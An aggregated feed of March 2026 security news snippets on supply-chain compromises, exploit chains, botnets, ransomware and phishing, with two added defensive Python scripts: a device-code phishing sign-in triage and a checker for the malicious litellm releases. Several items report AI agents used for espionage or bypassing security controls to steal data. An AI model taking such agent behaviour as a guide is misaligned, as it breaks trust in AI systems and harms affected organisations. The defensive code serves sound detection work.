Development houses: It's time to check your networks for infections. A new hacking group has been rampaging across the Internet in a persistent campaign that spreads a self-propagati
Published: 2026-03-24T12:38:09
Admins: Sorry to say, but it's likely a rotate-your-secrets kind of weekend. Hackers have compromised virtually all versions of Aqua Security’s widely used Trivy vulnerability
Published: 2026-03-20T20:50:46
One Microsoft product was approved despite years of concerns about its security. In late 2024, the federal government’s cybersecurity evaluators rendered a troubling verdict o
Published: 2026-03-18T17:36:40
Internet-exposed devices that give BIOS-level access? What could possibly go wrong? Researchers are warning about the risks posed by a low-cost device that can give insiders a
Published: 2026-03-17T17:07:12
Most of the devices are made by Asus and are located in the US. Researchers say they have uncovered a takedown-resistant botnet of 14,000 routers and other network devices pri
Published: 2026-03-11T21:27:16
If you've been putting off an update to iOS 26, now might be the time to do it. On Wednesday, security researchers published findings on a new hacking tool that targets iPhones running iOS 18.4 to 18.6.2, as reported earlier by Wired. The "DarkSword" exploit allows bad actors to scoop up the personal information on […]
Published: 2026-03-18T12:45:45
US medical equipment provider Stryker said its global networks were disrupted by a cyberattack on Wednesday, allegedly carried out by a hacking group linked to Iran. The attack impacted Stryker's internal Microsoft environment and deleted information from devices, with one employee telling NBC News that company phones stopped working, grinding work and communications to a […]
Published: 2026-03-12T07:28:53
Meta is adding more scam detection tools to Facebook, Messenger, and WhatsApp that can help users protect their accounts. In its announcement, Meta says the new features aim to alert users about suspicious activities before they engage with them, such as unrecognized friend requests and device linking notifications, because "we know that scammers try to […]
Published: 2026-03-11T07:00:00
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. [...]
Published: 2026-03-25T14:32:37
Citrix has patched two NetScaler ADC and NetScaler Gateway vulnerabilities, one of which is very similar to the CitrixBleed and CitrixBleed2 flaws exploited in zero-day attacks in recent years. [...]
Published: 2026-03-25T11:52:10
TP-Link has patched several vulnerabilities in its Archer NX router series, including a critical-severity flaw that may allow attackers to bypass authentication and upload new firmware. [...]
Published: 2026-03-25T07:11:00
A Russian national has been sentenced to two years in prison after admitting that the phishing botnet he managed was used to launch BitPaymer ransomware attacks against 72 U.S. companies. [...]
Published: 2026-03-25T04:47:29
The TeamPCP hacking group continues its supply-chain rampage, now compromising the massively popular "LiteLLM" Python package on PyPI and claiming to have stolen data from hundreds of thousands of devices during the attack. [...]
Published: 2026-03-24T18:29:01
The Federal Communications Commission has updated its Covered List to include all consumer routers made in foreign countries, banning the sale of new models in the U.S. [...]
Published: 2026-03-24T16:41:30
Bug bounty platform HackerOne is notifying hundreds of employees that their data was stolen after attackers hacked Navia, one of its U.S. benefits administrators. [...]
Published: 2026-03-24T10:01:02
Infinite Campus, a widely used K-12 student information system, is warning customers of a data breach following an extortion attempt by a threat actor. [...]
Published: 2026-03-24T09:48:38
A Russian national was sentenced to nearly 7 years in prison after pleading guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks. [...]
Published: 2026-03-24T09:06:03
Introduction Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to
Published: 2026-03-18T14:00:00
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark Introduction Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ran
Published: 2026-03-16T14:00:00
Federal Cyber Experts Thought Microsoft’s Cloud Was “a Pile of Shit.” They Approved It Anyway. (ProPublica) In late 2024, the federal government’s cybersecurity evaluators rendered a troubling verdict on one of Microsoft’s
Published: 2026-03-18T10:00:00
This DHS Official Oversees the Security of Federal Elections. He Wants to Ban Voting Machines. (ProPublica) In his top post at the Department of Homeland Security, David Harvilicz sets policy on protecting the nation’s ele
Published: 2026-03-14T18:00:00
The U.S. Justice Department joined authorities in Canada and Germany in dismantling the online infrastructure behind four highly disruptive botnets that compromised more than three million Internet of Things (IoT) devices, such as routers and web cam...
Published: 2026-03-20T00:49:19
A hacktivist group with links to Iran’s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker’s largest hub o...
Published: 2026-03-11T16:20:13
Microsoft Corp. today pushed security updates to fix at least 77 vulnerabilities in its Windows operating systems and other software. There are no pressing “zero-day” flaws this month (compared to February’s five zero-day treat), bu...
Published: 2026-03-11T00:32:51
Four former NSA bosses walk onto the stage at RSAC RSAC 2026 There's a theoretical red line with cyber warfare. Cross it, and the US will respond with a physical attack like missile strikes. And that line "is whatever the President says it is," according to former NSA boss retired General Paul Nakasone.
Published: 2026-03-25T18:55:14
Omnissa telemetry suggests business buyers are loving Apple and Google End-user compute vendor Omnissa, the company formed by the spin-out of VMware's virtual desktops, applications, and device management biz, has dug into the telemetry it collects from customers and painted a picture of the world's enterprise hardware fleet and the news is better for Google and Apple than it is for Microsoft.
Published: 2026-03-25T07:29:12
Cyber rights org retools for the days of AI and unrestrained government interview The Electronic Frontier Foundation (EFF) on Tuesday appointed Nicole Ozer to succeed Cindy Cohn as the cyber rights group's executive director when Cohn departs this summer.
Published: 2026-03-24T21:00:08
Crims 'creating a snowball effect' across open source projects RSAC 2026 Thousands of organizations' cloud environments have been infected with secret-stealing malware as a result of the Trivy supply-chain attack last week, and now the crims that compromised the open source scanners are working with notorious extortion crews like Lapsus$.
Published: 2026-03-24T20:31:09
Python interface for LLMs infected with malware via polluted CI/CD pipeline Two versions of LiteLLM, an open source interface for accessing multiple large language models, have been removed from the Python Package Index (PyPI) following a supply chain attack that injected them with malicious credential-stealing code.
Published: 2026-03-24T19:11:01
Nearly 300 employees caught up in intrusion at benefits provider Navia Almost 300 HackerOne employees are caught up in a data breach, with the bug bounty biz slamming a third-party benefits provider for a weeks-long delay in notification.
Published: 2026-03-24T13:27:07
Unfortunately, there aren't many options unless you're Starlink Citing national security fears, America is effectively banning any new consumer-grade network routers made abroad.
Published: 2026-03-24T12:19:36
Aleksei Volkov sentenced after enabling attacks that cost victims millions A Russian national who sold the keys to corporate networks faces nearly seven years in a US prison after prosecutors tied his handiwork to a string of ransomware attacks costing victims millions of dollars.
Published: 2026-03-24T11:32:11
'It freakin' worked' says Rob Joyce - and shows how relentless AI agents can find holes humans miss RSAC 2026 The now-infamous Anthropic report about Chinese cyberspies abusing Claude AI to automate cyberattacks was a Rorschach test for the infosec community, according to former NSA cyber boss Rob Joyce.
Published: 2026-03-23T22:50:21
Here's where you ought to spend your security billable hours budget this year Strengthen your MFA policies, double-down on anti-phishing training, and for Jobs' sake, patch all your vulns right away. The past year of intelligence collected by Cisco's Talos threat hunters suggests that attackers are moving faster to exploit vulns, and fooling more staff than ever into giving up their credentials.
Published: 2026-03-23T20:42:11
Claims it can analyze millions of daily events with 98 percent accuracy RSAC 2026 Google's Gemini AI agents are crawling the dark web, sifting through upward of 10 million posts a day to find a handful of threats relevant to a particular organization.
Published: 2026-03-23T15:05:09
Voice phishing is second most common initial access method across all IR probes, and top in cloud break-ins RSAC 2026 Voice phishing surged last year to become the second most common method used by cybercriminals to gain initial access to their victims' IT estate and the No. 1 tactic used when breaking into cloud environments.
Published: 2026-03-23T15:00:10
Trio-Tech International initially said hack wasn't 'material,' but then stolen data was published Trio-Tech International initially shrugged off a ransomware attack at a Singapore subsidiary as immaterial, only to reverse course days later after discovering stolen data had been disclosed.
Published: 2026-03-23T12:33:15
Infosec pros descend on San Francisco kettle When El Reg cybersecurity editor Jessica Lyons joins infosec industry colleagues in San Francisco for RSAC 2026 this week, she's expecting agentic AI to be on everyone's lips - at least those who aren't busy gossiping about the lack of presence from any representatives of the US federal government.
Published: 2026-03-23T12:24:50
The era of reliability begins... right after this out-of-band patch Microsoft has released an out-of-band update to resolve bugs introduced by a Windows patch just days after promising improved reliability.
Published: 2026-03-23T11:24:37
Ukraine's battlefield lessons show quantity and affordability now trump exquisite hardware NATO is unprepared to deal with attacks by cheap, mass-produced drones and urgently needs layered, affordable air defense systems to counter the threat, taking a cue from the experience gained by Ukrainian forces over the past four years.
Published: 2026-03-23T10:14:12
PLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Infosec In Brief Russian intelligence-affiliated parties are posing as customer support services on commercial messaging applications such as Signal to compromise accounts and conduct phishing attacks, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday.
Published: 2026-03-22T22:12:06
Rust security maintainers contend Nadim Kobeissi's vulnerability claims are too much Updated Since February, cryptographer Nadim Kobeissi has been trying to get code fixes applied to Rust cryptography libraries to address what he says are critical bugs. For his efforts, he's been dismissed, ignored, and banned from Rust security channels.
Published: 2026-03-20T21:07:17
Cams statistically more likely to ID Black people, says new research A UK police force has suspended its deployment of live facial recognition (LFR) technology after a study revealed it was statistically more likely to identify Black people on a watchlist database.
Published: 2026-03-20T13:35:25
Millions of hijacked devices powered traffic floods targeting defense systems and beyond The US government has moved to disrupt a cluster of IoT botnets behind some of the largest DDoS attacks ever recorded, including traffic bursts topping 30 terabits per second.
Published: 2026-03-20T13:07:26
Lack of clear criteria risks encouraging firms to lean on state support instead of worrying about insurance The UK's cyber watchdog has warned that the government's £1.5 billion bailout of Jaguar Land Rover (JLR) risks setting a troubling precedent for how Britain handles major cyber crises.
Published: 2026-03-20T12:42:10
Audit trails aplenty, but no price tag and no clue how long your data sticks around Opinion Last week's UK government consultation on its plans for digital identity had quite a few things missing. It did not include a price estimate - something it said was due to decisions yet to be taken on the scheme's scope - or how long the government would keep "audit trail" records of ID checks.
Published: 2026-03-20T10:15:14
He would have gotten away with it too, if it weren't for a meddling security team's fear of USB On Call Each Friday The Register offers a fresh installment of On Call, the reader-contributed column that celebrates the fine art of tech support.
Published: 2026-03-20T07:30:11
Last time: Beijing-backed snoops and ransomware crims. Who's next? Unknown baddies are abusing yet another critical Microsoft SharePoint bug to compromise victims' SharePoint servers, the US government warned.
Published: 2026-03-19T18:54:19
Chocolate Factory describes concession as an attempt to balance openness with safety It turns out you won't be limited to Google-verified apps and developers on Android after all. In the face of sustained community dissatisfaction with its developer verification requirement, Google has given Android users an out.
Published: 2026-03-19T18:30:06
Iran-linked attackers wiped employees' devices using Intune The US government has urged companies to better secure Microsoft Intune, an endpoint management tool that was abused in last week's cyberattack against med-tech firm Stryker.
Published: 2026-03-19T16:00:20
Where are you? What are you working on? Why are you doing that? Identity and access management platform Okta announced the general availability of its Okta for AI Agents, which will give customers the ability to do three things: locate agents, see what they're doing, and shut them down if need be.
Published: 2026-03-18T23:05:31
Darksword is the second iOS exploit chain in a month A new exploit kit targeting iPhone users and stealing their sensitive data is being abused by "multiple" spyware vendors and suspected nation-state goons, security researchers said on Wednesday.
Published: 2026-03-18T21:39:04
Interlock's post-exploit toolkit exposed Ransomware criminals exploited CVE-2026-20131, a maximum-severity bug in Cisco Secure Firewall Management Center software, as a zero-day vulnerability more than a month before Cisco patched the hole, according to Amazon security boss CJ Moses.
Published: 2026-03-18T17:40:31
Researchers map full org chart of the scam from dodgy recruiters to helpful Western collaborators Researchers at IBM X-Force and Flare Research have uncovered data that sheds light on how North Korea's fake IT worker schemes operate and infiltrate companies in order to funnel money back to the regime and steal sensitive information.
Published: 2026-03-18T13:57:07
No. 1 Space Operations Squadron will get a persistent stare capability The Ministry of Defence (MoD) plans to spend £17.5 million on a remotely-operated satellite monitoring facility in Cyprus, partly to protect the UK's secure communications system Skynet.
Published: 2026-03-18T12:34:15
Even without a navy, or air power, 'They'll still have the ability to hack' Businesses should expect that Iran will conduct more aggressive cyber-ops as the war escalates, according to security analysts.
Published: 2026-03-18T07:32:08
Big Tech donates $12.5 million to get things rolling Half a dozen Big Tech players have together delivered $12.5 million in grants towards a project that aims to help maintainers of open source projects to cope with AI slop bug reports.
Published: 2026-03-18T04:05:45
In less polite places, this is called hacking back or offensive cyber-ops Japan's government yesterday decided to allow its Self-Defense Force to conduct offensive cyber-operations, starting on October 1st.
Published: 2026-03-18T02:49:49
Sell your soul to the orb Sam Altman has cooked up a plan to make his cryptocurrency/identity/eyeball-scanning-orb venture more useful by, you guessed it, adding agentic AI to the mix. Now the technology behind it will be used to identify the human behind bots.
Published: 2026-03-17T20:26:08
State-sponsored attackers joined by Chinese snoops and hackers-for-hire in latest round of economic penalties The Council of the European Union sanctioned Emennet Pasargad on Monday, a company used as a front for a series of Iranian cyberattacks.
Published: 2026-03-17T16:18:38
Midmarket security leaders aren't as secure as they think, says Intruder's report Partner Content The midmarket matters. JP Morgan estimates approximately 300,000 organizations generating $13T in annual revenue. Yet they occupy an awkward position in the security landscape. They're large enough to be attractive targets with complex digital estates, significant revenue, and valuable data, but not large enough to have the headcount, budget maturity, or tooling sophistication of an enterprise security team.
Published: 2026-03-17T09:00:16
SCION: Proven in banking and healthcare, slow to spread everywhere else Feature BGP, the Border Gateway Protocol, was not designed to be secure. It was designed to work to route packets between the thousands of autonomous systems that make up the internet, quickly and at scale.
Published: 2026-03-17T08:15:07
Admins may be even more exhausted by then, because securing Microsoft's AI helper is not a trivial job Gartner analyst Dennis Xu has half-jokingly suggested banning use of Microsoft's Copilot AI on Friday afternoons, because he fears at that time of week users may be too lazy to properly check its possibly offensive output.
Published: 2026-03-17T04:37:40
AI helped send weekly threat signal count from 80 million to 400 billion, then helped response time shrink from two days to 30 minutes Australia's Commonwealth Bank built its own agentic AI threat hunting tools, because vendors are too slow to develop tools that can cope with emerging AI-powered threats, according to General Manager of Cyber Defence Operations Andrew Pade.
Published: 2026-03-17T02:37:16
Operations and hospital networks not affected, we're told Robotics-assisted surgical tech firm Intuitive said that unauthorized intruders gained access to some of its internal IT business applications after stealing an employee's credentials during a phishing attack.
Published: 2026-03-16T20:04:08
Hacktivists use proxy services from Russia, China for 'billions of designed-for-abuse connection attempts' Cybercrime has skyrocketed since the start of the Iran war, according to Akamai, which reports a 245 percent increase in everything from credential harvesting attempts to automated reconnaissance traffic aimed at banks and other critical businesses.
Published: 2026-03-16T18:40:30
Interpol says fraud schemes using the tech are 4.5x more profitable AI is apparently good for the bottom line if your business is crime. Financial fraud schemes carried out with the help of artificial intelligence are 4.5 times more profitable than those that aren't enhanced, according to Interpol's latest estimates.
Published: 2026-03-16T16:40:06
Back button blunder in WebFiling service run by Companies House revealed confidential paperwork Companies House was forced to pull down its record-filing platform for the entire weekend to rectify a "security issue" that exposed the personal details of company directors and other data to any logged in users.
Published: 2026-03-16T12:18:23
PLUS: Citrix CISO urges patch blitz; Mandiant founder reveals AI red-teaming tech; Bitter privacy news for Starbucks; And more Infosec In Brief Canadian outsourcer Telus Digital has admitted it fell victim to a cyberattack.
Published: 2026-03-15T23:24:51
And then they send victims to the legit VPN download to hide their tracks A group of cybercriminals tracked as Storm-2561 is using fake enterprise VPN clients from Check Point, Cisco, Fortinet, Ivanti, and other vendors to steal users' credentials, according to Microsoft.
Published: 2026-03-13T17:17:19
Operation Synergia's third season is the most productive to date Ninety-four people were arrested as part of a global, multi-month cybercrime crackdown, Interpol revealed today.
Published: 2026-03-13T12:39:54
Take your YOLO and box it up Exclusive NanoClaw, an open source agent platform, can now run inside Docker Sandboxes, furthering the project's commitment to security.
Published: 2026-03-13T11:50:11
Flaws in the Skia graphics lib and V8 JavaScript engine bring browser's tally of actively exploited bugs to three in 2026 Google has pushed out an emergency Chrome update to fix two previously unknown vulnerabilities that attackers were already exploiting before the patches landed.
Published: 2026-03-13T11:25:14
Prompt like a hard-ass boss who won't tolerate failure and bots will find ways to breach policy AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular.
Published: 2026-03-12T23:49:32
As war reshapes the Gulf, the satellite infrastructure the world relies on to see conflict clearly is being delayed, spoofed, and privately controlled, and nobody is sure who is responsible.
Published: 2026-03-25T13:00:42
The crowdsourced website and app Mahsa Alert provides citizens in Iran with crucial information amid the country’s ongoing war with the US and Israel and an internet blackout.
Published: 2026-03-25T09:00:00
Attachment to smart devices and biometric surveillance leaves Americans more vulnerable to police searches than ever. Left unchecked it will only get worse.
Published: 2026-03-24T10:00:00
A family in Chicago has been terrified to leave their apartment. Agents could be anywhere.
Published: 2026-03-24T10:00:00
Under a Homeland Security program, police departments around the US are signing up to assist in immigration enforcement. The cops of Carroll, New Hampshire, are going all in and they’re likely not alone.
Published: 2026-03-24T09:00:00
First heard as US and Israeli strikes on Iran began, the shortwave broadcast has since been traced to a US military base in Germany, but its purpose and its operator remain unclear.
Published: 2026-03-23T18:59:17
In a place denied access to basic forensic technology and where people disappear into Israeli detention the fate of thousands remains unknown. One of them is an autistic teenager.
Published: 2026-03-23T10:00:00
For families of the missing, systemic obstacles to identifying remains and locating people in Israeli detention have created a kind of social and legal purgatory.
Published: 2026-03-23T10:00:00
Plus: The FBI admits it’s buying phone data to track Americans, Iranian hackers disrupt medical care at Maryland hospitals, and more.
Published: 2026-03-21T10:30:00
Congressman Jim Himes claims a sweeping surveillance authority should stay intact because he hasn't seen abuses by Kash Patel's FBI, according to internal messaging obtained by WIRED.
Published: 2026-03-20T20:46:45
Meta blamed users for not opting into the privacy-protecting feature. Experts fear the move could be the first major domino to fall for end-to-end encryption tech worldwide.
Published: 2026-03-20T10:00:00
The Aisuru, Kimwolf, JackSkid, and Mossad botnets had infected more than 3 million devices in total, many inside home networks, according to the US Justice Department.
Published: 2026-03-20T00:07:30
Moxie Marlinspike says the technology powering his encrypted AI chatbot, Confer, will be integrated into Meta AI. The move could help protect the AI conversations of millions of people.
Published: 2026-03-19T14:09:51
A powerful iPhone-hacking technique known as DarkSword has been discovered in use by Russian hackers. It can take over devices running iOS 18 that simply visit infected websites.
Published: 2026-03-18T14:00:00
On March 26, a panel of WIRED experts will dissect the defense tech industry’s impact on modern warfare. Submit your questions now.
Published: 2026-03-18T10:30:00
Customer conversations with chatbots can include contact information and personal details that make it easier for scammers to launch phishing attacks and commit fraud.
Published: 2026-03-17T10:00:00
Dozens of Telegram channels reviewed by WIRED include job listings for “AI face models.” The (mostly) women who land these gigs are likely being used to dupe victims out of their money.
Published: 2026-03-16T09:00:00
Plus: A porn-quitting app exposed the masturbation habits of hundreds of thousands of users, Russian hackers are trying to take over people’s Signal accounts, and more.
Published: 2026-03-14T10:30:00
A bipartisan bill would force the FBI to get a warrant to read Americans’ messages and ban the federal purchase of commercial data on US residents ahead of a critical April deadline.
Published: 2026-03-12T18:00:00
Amid a paralyzing breach of medical tech firm Stryker, the group has come to represent Iran's use of “hacktivism” as cover for chaotic, retaliatory state-sponsored cyberattacks.
Published: 2026-03-12T16:14:39
The alleged administrator of the LeakBase cybercrime forum has been arrested by Russian law enforcement authorities, state media reported Thursday. According to TASS and MVD Media, a news website linked to the Russian Interior Ministry, the suspect is a resident of the city of Taganrog. The suspect is said to have been detained for creating and managing a criminal site that allowed stolen
Published: 2026-03-25T23:05:00
Cybersecurity researchers have flagged a new evolution of the GlassWorm campaign that delivers a multi-stage framework capable of comprehensive data theft and installing a remote access trojan (RAT), which deploys an information-stealing Google Chrome extension masquerading as an offline version of Google Docs. "It logs keystrokes, dumps cookies and session tokens, captures screenshots, and
Published: 2026-03-25T19:56:00
In September 2025, Anthropic disclosed that a state-sponsored threat actor used an AI coding agent to execute an autonomous cyber espionage campaign against 30 global targets. The AI handled 80-90% of tactical operations on its own, performing reconnaissance, writing exploit code, and attempting lateral movement at machine speed. This incident is worrying, but there's a scenario that should
Published: 2026-03-25T17:28:00
The U.S. Department of Justice (DoJ) said a Russian national has been sentenced to two years in prison for managing a botnet that was used to launch ransomware attacks against U.S. companies. Ilya Angelov, 40, of Tolyatti, Russia, was also fined $100,000. Angelov, who went by the online aliases "milan" and "okart," is said to have co-managed a Russia-based cybercriminal group known as TA551 (aka
Published: 2026-03-25T17:22:00
Cybersecurity researchers are calling attention to an active device code phishing campaign that's targeting Microsoft 365 identities across more than 340 organizations in the U.S., Canada, Australia, New Zealand, and Germany. The activity, per Huntress, was first spotted on February 19, 2026, with subsequent cases appearing at an accelerated pace since then. Notably, the campaign leverages
Published: 2026-03-25T17:04:00
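Device code phishing leaves a distinctive trail in sign-in telemetry, so here is the triage a responder would run over an exported sign-in log. This is an added example, not code from the page or from Huntress. It assumes the Microsoft Graph signIn field names (authenticationProtocol, ipAddress, location.countryOrRegion, status.errorCode, userPrincipalName, createdDateTime) and that browser sign-ins carry a non-deviceCode protocol value; verify both against your own export. The records are constructed.

```python
"""Triage an Entra ID sign-in export for device code flow logons, the
technique in the campaign above. Added example; not code from the page or
from Huntress. Field names (authenticationProtocol, ipAddress,
location.countryOrRegion, status.errorCode, userPrincipalName,
createdDateTime) follow the Microsoft Graph signIn resource as I read it;
check them against your own export. All records below are constructed."""
from collections import defaultdict


def build_baseline(records):
    """Per user: countries and IPs seen on successful sign-ins that did NOT
    use device code, i.e. what 'normal' looks like for that user."""
    base = defaultdict(lambda: {"countries": set(), "ips": set()})
    for r in records:
        if r.get("status", {}).get("errorCode", 0) != 0:
            continue
        if r.get("authenticationProtocol") == "deviceCode":
            continue
        u = r["userPrincipalName"].lower()
        base[u]["countries"].add(r.get("location", {}).get("countryOrRegion"))
        base[u]["ips"].add(r.get("ipAddress"))
    return base


def triage_device_code(records):
    """Findings for successful deviceCode sign-ins, oldest first:
    (createdDateTime, user, ip, country, severity, reasons).
    Strong signals: country outside the user's baseline, no baseline at all,
    or the same source IP completing device code logons for several users
    (shared attacker infrastructure). Two strong signals -> high, one ->
    medium, none -> low. An unseen IP alone is informational."""
    base = build_baseline(records)
    dc = [r for r in records
          if r.get("authenticationProtocol") == "deviceCode"
          and r.get("status", {}).get("errorCode", 0) == 0]
    users_per_ip = defaultdict(set)
    for r in dc:
        users_per_ip[r.get("ipAddress")].add(r["userPrincipalName"].lower())

    findings = []
    for r in sorted(dc, key=lambda x: x["createdDateTime"]):
        u = r["userPrincipalName"].lower()
        ip = r.get("ipAddress")
        country = r.get("location", {}).get("countryOrRegion")
        reasons, strong = ["device code flow completed"], 0
        b = base.get(u)
        if b is None:
            reasons.append("no non-device-code baseline for this user in the window")
            strong += 1
        else:
            if country not in b["countries"]:
                known = sorted(c for c in b["countries"] if c)
                reasons.append(f"country {country} outside baseline {known}")
                strong += 1
            elif ip not in b["ips"]:
                reasons.append("source IP not seen on the user's other sign-ins")
        others = users_per_ip[ip] - {u}
        if others:
            reasons.append(f"same IP completed device code logons for {sorted(others)}")
            strong += 1
        severity = "high" if strong >= 2 else "medium" if strong == 1 else "low"
        findings.append((r["createdDateTime"], u, ip, country, severity, reasons))
    return findings


def _rec(ts, upn, proto, ip, country, err=0):
    """Constructed sign-in record in Graph signIn shape (not real telemetry).
    'none' is assumed here as the protocol value for ordinary browser sign-ins."""
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "authenticationProtocol": proto, "ipAddress": ip,
            "location": {"countryOrRegion": country}, "status": {"errorCode": err}}


# Constructed sample export; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_SIGNINS = [
    _rec("2026-03-19T08:02:00Z", "alice@example.com", "none", "203.0.113.10", "US"),
    _rec("2026-03-19T08:40:00Z", "bob@example.com", "none", "203.0.113.22", "US"),
    _rec("2026-03-19T09:15:00Z", "carol@example.com", "none", "203.0.113.31", "US"),
    _rec("2026-03-20T10:05:00Z", "alice@example.com", "deviceCode", "198.51.100.7", "NL"),
    _rec("2026-03-20T10:09:00Z", "bob@example.com", "deviceCode", "198.51.100.7", "NL"),
    _rec("2026-03-20T11:30:00Z", "carol@example.com", "deviceCode", "203.0.113.30", "US"),
    _rec("2026-03-20T12:00:00Z", "dave@example.com", "deviceCode", "198.51.100.7", "NL", err=50126),
]

if __name__ == "__main__":
    for f in triage_device_code(SAMPLE_SIGNINS):
        print(f)
```

The shared-IP signal is the one worth keeping even if the baseline logic is replaced by your SIEM's own: a single address completing device code logons for several users in one tenant is attacker polling infrastructure, not a fleet of CLI users. Device code flow has legitimate uses (Azure CLI, headless devices), so block it by Conditional Access for users who have no such need rather than for everyone.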
The U.S. Federal Communications Commission (FCC) said on Monday that it was banning the import of new, foreign-made consumer routers, citing "unacceptable" risks to cyber and national security. The action was designed to safeguard Americans and the underlying communications networks the country relies on, FCC Chairman Brendan Carr said in a post on X. The development means that new models of
Published: 2026-03-25T12:41:00
TeamPCP, the threat actor behind the recent compromises of Trivy and KICS, has now compromised a popular Python package named litellm, pushing two malicious versions containing a credential harvester, a Kubernetes lateral movement toolkit, and a persistent backdoor. Multiple security vendors, including Endor Labs and JFrog, revealed that litellm versions 1.82.7 and 1.82.8 were published on March
Published: 2026-03-24T23:51:00
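A check a team can run today, as an added example (not code from the page, from litellm, or from any vendor named here): it scans requirement lines for litellm and reports whether a pin or a floating specifier can resolve to 1.82.7 or 1.82.8, the two releases named above, and whether either is installed in the current interpreter. The sample requirements are constructed; the specifier parser handles plain numeric versions only, so reach for the packaging library if your pins are more exotic.

```python
"""Flag requirement lines and installed distributions that pin, or could
resolve to, the two litellm releases reported as malicious (1.82.7, 1.82.8).
Added example; not code from the page, from litellm, or from any vendor named
on it. The version comparison handles plain numeric versions only."""
import re
from importlib import metadata

# Releases named in the reports above; extend as advisories are updated.
BAD_VERSIONS = {"litellm": {"1.82.7", "1.82.8"}}

# name, optional [extras], then everything up to a comment or env marker
_REQ_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*([^;#]*)")
_CLAUSE_RE = re.compile(r"(===|==|!=|<=|>=|<|>|~=)\s*(.+)")


def _vtuple(v):
    """(1, 82, 7) for '1.82.7'; a trailing '.*' simply yields the prefix."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def _satisfies(version, spec):
    """True if `version` satisfies every clause of a PEP 440 specifier set.
    An empty spec (no pin at all) matches everything. Clauses this simple
    parser cannot read are skipped, which errs toward flagging the line."""
    v = _vtuple(version)
    for clause in filter(None, (c.strip() for c in spec.split(","))):
        m = _CLAUSE_RE.match(clause)
        if not m:
            continue
        op, target = m.group(1), m.group(2).strip()
        t = _vtuple(target)
        if target.endswith(".*") and op in ("==", "!="):
            ok = (v[: len(t)] == t) == (op == "==")
        elif op == "===":
            ok = version == target
        elif op == "~=":  # ~=1.82.0 means >=1.82.0 and ==1.82.*
            ok = v >= t and v[: len(t) - 1] == t[: len(t) - 1]
        else:
            ok = {"==": v == t, "!=": v != t, "<": v < t,
                  "<=": v <= t, ">": v > t, ">=": v >= t}[op]
        if not ok:
            return False
    return True


def check_requirements(lines):
    """Findings for lines whose specifier admits a bad release:
    (package, line, [bad versions admitted], reason)."""
    findings = []
    for line in lines:
        m = _REQ_RE.match(line)
        if not m:
            continue
        name = m.group(1).lower().replace("_", "-")
        if name not in BAD_VERSIONS:
            continue
        spec = m.group(3).strip()
        hits = sorted(b for b in BAD_VERSIONS[name] if _satisfies(b, spec))
        if hits:
            exact = spec.startswith("==") and "*" not in spec and "," not in spec
            reason = "pinned to bad release" if exact else "specifier admits bad release"
            findings.append((name, line.strip(), hits, reason))
    return findings


def check_installed():
    """(package, version) for bad releases installed in this interpreter."""
    found = []
    for name, bad in BAD_VERSIONS.items():
        try:
            v = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
        if v in bad:
            found.append((name, v))
    return found


# Constructed sample, not a real project's requirements file.
SAMPLE_REQUIREMENTS = """
requests==2.32.3
litellm==1.82.7                 # exact pin on a bad release
LiteLLM[proxy]>=1.80,<1.83      # floating range that resolves to 1.82.x
litellm~=1.81.0                 # ~= keeps the minor at 1.81: cannot reach 1.82.x
litellm!=1.82.7,!=1.82.8,>=1.82 # explicit exclusions
""".strip().splitlines()

if __name__ == "__main__":
    for f in check_requirements(SAMPLE_REQUIREMENTS):
        print("requirements:", f)
    for f in check_installed():
        print("installed:", f)
```

Run it over requirements files, constraints files and the output of pip freeze from every build image, not just the repository; a floating range that was fine last month is the line that pulled the bad release in. A hit means the credentials that environment could see are in scope for rotation.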
A large-scale malvertising campaign active since January 2026 has been observed targeting U.S.-based individuals searching for tax-related documents to serve rogue installers for ConnectWise ScreenConnect that drop a tool named HwAudKiller to blind security programs using the bring your own vulnerable driver (BYOVD) technique. "The campaign abuses Google Ads to serve rogue ScreenConnect (
Published: 2026-03-24T22:35:00
On February 25, 2026, Gartner published its inaugural Market Guide for Guardian Agents, marking an important milestone for this emerging category. For those unfamiliar with the various Gartner report types, “a Market Guide defines a market and explains what clients can expect it to do in the short term. With the focus on early, more chaotic markets, a Market Guide does not rate or position
Published: 2026-03-24T22:06:05
An ongoing phishing campaign is targeting French-speaking corporate environments with fake resumes that lead to the deployment of cryptocurrency miners and information stealers. "The campaign uses highly obfuscated VBScript files disguised as resume/CV documents, delivered through phishing emails," Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said in a report shared
Published: 2026-03-24T22:05:00
Cybersecurity has changed fast. Roles are more specialized, and tooling is more advanced. On paper, this should make organizations more secure. But in practice, many teams struggle with the same basic problems they faced years ago: unclear risk priorities, misaligned tooling decisions, and difficulty explaining security issues in terms the business understands. These challenges do not
Published: 2026-03-24T17:31:00
Cybersecurity researchers have uncovered a new set of malicious npm packages that are designed to steal cryptocurrency wallets and sensitive data. The activity is being tracked by ReversingLabs as the Ghost campaign. The list of identified packages, all published by a user named mikilanjillo, is below - react-performance-suite react-state-optimizer-core react-fast-utilsa ai-fast-auto-trader
Published: 2026-03-24T17:30:00
Two more GitHub Actions workflows have become the latest to be compromised with credential-stealing malware by a threat actor known as TeamPCP, the cloud-native cybercriminal operation also behind the Trivy supply chain attack. The workflows, both maintained by the supply chain security company Checkmarx, are listed below - checkmarx/ast-github-action checkmarx/kics-github-action Cloud security
Published: 2026-03-24T16:08:00
